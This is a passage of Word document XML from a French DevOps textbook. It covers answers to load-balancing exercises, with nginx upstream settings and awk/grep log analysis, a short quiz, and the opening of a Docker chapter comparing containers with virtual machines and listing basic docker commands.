        <w:t xml:space="preserve">    proxy_connect_timeout 2s;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    proxy_read_timeout 30s;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    proxy_next_upstream error timeout http_502 http_503;</w:t>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un délai de connexion court évite d'attendre une instance morte avant de passer à la suivante.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>max_fails</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> et </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>fail_timeout</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> écartent temporairement une instance défaillante, sans intervention.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 61.2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>API rapide : round-robin, les instances sont interchangeables.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Téléchargements longs : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>least_conn</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>, pour ne pas empiler sur une instance déjà occupée.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Session en mémoire : IP hash ou, mieux, sortir la session vers Redis pour retrouver l'interchangeabilité.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 61.3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t># Temps de réponse par minute</w:t>
        <w:br/>
        <w:t>awk '{print $4, $NF}' /var/log/nginx/access.log \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  | cut -c1-17 | sort | uniq -c | tail -20</w:t>
        <w:br/>
        <w:br/>
        <w:t># Temps amont (dernier champ du format enrichi)</w:t>
        <w:br/>
        <w:t>awk '{print $(NF-2)}' /var/log/nginx/access.log | sort -n | tail -5</w:t>
        <w:br/>
        <w:br/>
        <w:t># Cache : taux de succès</w:t>
        <w:br/>
        <w:t>grep -c " 200 " /var/log/nginx/access.log</w:t>
        <w:br/>
        <w:t>grep -c " 304 " /var/log/nginx/access.log</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un temps total élevé avec un temps amont faible indique un problème réseau ou de sérialisation côté proxy.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un temps amont élevé désigne l'application ou l'une de ses dépendances.</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 algorithme convient à des sessions en mémoire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Round-robin</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IP hash</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Least connections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Random</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Pourquoi une vérification TCP est-elle insuffisante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Elle est trop lente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Elle ne prouve pas que l'application répond</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Elle nécessite root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Elle ne fonctionne pas</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 fait un CDN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Compile le code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Rapproche les contenus des utilisateurs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Gère les bases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Remplace le DNS</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Pourquoi ne pas mettre en cache une erreur 500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C'est interdit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Elle resterait servie après correction</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Cela consomme trop</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Cela casse TLS</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Qu'est-ce qu'un disjoncteur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 fusible électrique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Un arrêt temporaire des appels à une dépendance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Un type de proxy</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Un algorithme de répartition</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L'affinité par adresse envoie un client toujours vers la même instance.</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Un processus bloqué peut accepter des connexions sans servir.</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Il met en cache au plus près des clients et absorbe la charge.</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Un cache de bord persistant continue de servir l'erreur.</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Il évite d'accumuler des attentes sur une dépendance défaillante.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:sectPr>
          <w:headerReference w:type="default" r:id="rId94"/>
          <w:footerReference w:type="default" r:id="rId95"/>
          <w:pgSz w:w="11906" w:h="16838"/>
          <w:pgMar w:top="1474" w:right="1361" w:bottom="1361" w:left="1531" w:header="709" w:footer="652" w:gutter="0"/>
          <w:cols w:space="720"/>
          <w:titlePg/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9014"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="11679" w:hRule="exact"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9240"/>
            <w:shd w:val="clear" w:color="auto" w:fill="0F2E4C"/>
            <w:tcMar>
              <w:top w:w="800" w:type="dxa"/>
              <w:left w:w="680" w:type="dxa"/>
              <w:bottom w:w="800" w:type="dxa"/>
              <w:right w:w="680" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="E0A21B"/>
                <w:sz w:val="20"/>
                <w:spacing w:val="60"/>
              </w:rPr>
              <w:t>PARTIE III</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TitrePartie"/>
              <w:spacing w:before="0" w:after="160" w:line="680" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="56"/>
              </w:rPr>
              <w:t>Conteneurs et orchestration</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="16" w:space="1" w:color="E0A21B"/>
              </w:pBdr>
              <w:spacing w:before="0" w:after="200"/>
            </w:pPr>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="80" w:after="280" w:line="330" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="D6E1EB"/>
                <w:sz w:val="23"/>
              </w:rPr>
              <w:t>Docker, images reproductibles, réseaux, Compose, Kubernetes, Helm et service mesh.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="250" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="E0A21B"/>
                <w:sz w:val="16"/>
                <w:spacing w:val="40"/>
              </w:rPr>
              <w:t>CHAPITRES</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:line="270" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="C9D6E2"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>46. Docker : conteneurs, images et cycle de vie · 47. Images reproductibles et sûres · 48. Réseaux et volumes Docker · 49. Docker Compose : applications multi-services · 50. Kubernetes : modèle et objets fondamentaux · 51. Services, entrées et configuration · 52. Stockage et applications à état</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>62. Docker : conteneurs, images et cycle de vie</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="40" w:after="200" w:line="372" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Comprendre ce qu'est réellement un conteneur, puis l'utiliser sans en faire une machine virtuelle.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="80" w:line="230" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Durée de travail : 3 h 15 · Niveau : Intermédiaire · Prérequis : chapitre 61</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Distinguer conteneur, image et machine virtuelle.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Exécuter et inspecter un conteneur.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Écrire un Dockerfile lisible.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Gérer les ressources et le cycle de vie.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Nettoyer sans supprimer l'utile.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>62.1 Un processus isolé, pas une machine</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un conteneur est un processus ordinaire, isolé par des mécanismes du noyau : espaces de noms pour la visibilité, groupes de contrôle pour les ressources. Il n'y a pas de noyau invité, donc pas de démarrage de système.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="120" w:after="0" w:line="20" w:lineRule="exact"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5580000" cy="2730500"/>
            <wp:docPr id="75" name="Picture 75"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="c00_f73.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId109"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5580000" cy="2730500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Figure 0.73 — Machine virtuelle et conteneur</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.221 — Cinq différences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35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Aspect</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="332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Machine virtuelle</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="332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Conteneur</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2358"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Isolation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3328"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Forte (matériel émulé)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3328"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Processus (noyau partagé)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="235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Démarrage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="332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Secondes à minutes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="332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Millisecondes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2358"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Densité</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3328"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Quelques-unes par hôte</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3328"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Des dizaines par hôte</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="235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Sécurité</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="332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Frontière matérielle</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="332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Frontière du noyau</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2358"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Usage typique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3328"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Système complet</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3328"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Service unique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IMAGE</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Archive immuable composée de couches empilées. Le conteneur est une instance en exécution de cette image, avec une couche d'écriture propre.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Six commandes de base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Exécuter et observer</w:t>
        <w:br/>
        <w:t>docker run -d --name web -p 8080:80 nginx:1.27-alpine</w:t>
        <w:br/>
        <w:t>docker ps</w:t>
        <w:br/>
        <w:t>docker logs -f web</w:t>
        <w:br/>
        <w:t>docker exec -it web sh</w:t>
        <w:br/>
        <w:t>docker inspect web | head -40</w:t>
        <w:br/>
        <w:t>docker stats web</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.222 — Sept sous-commandes usuelles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Sous-commande</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="374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305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Remarque</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2219"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>run</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3744"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Créer et démarrer</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Une commande = un conteneur</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="221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ps</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="374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Lister</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w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> inclut les arrêtés</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2219"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>logs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3744"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
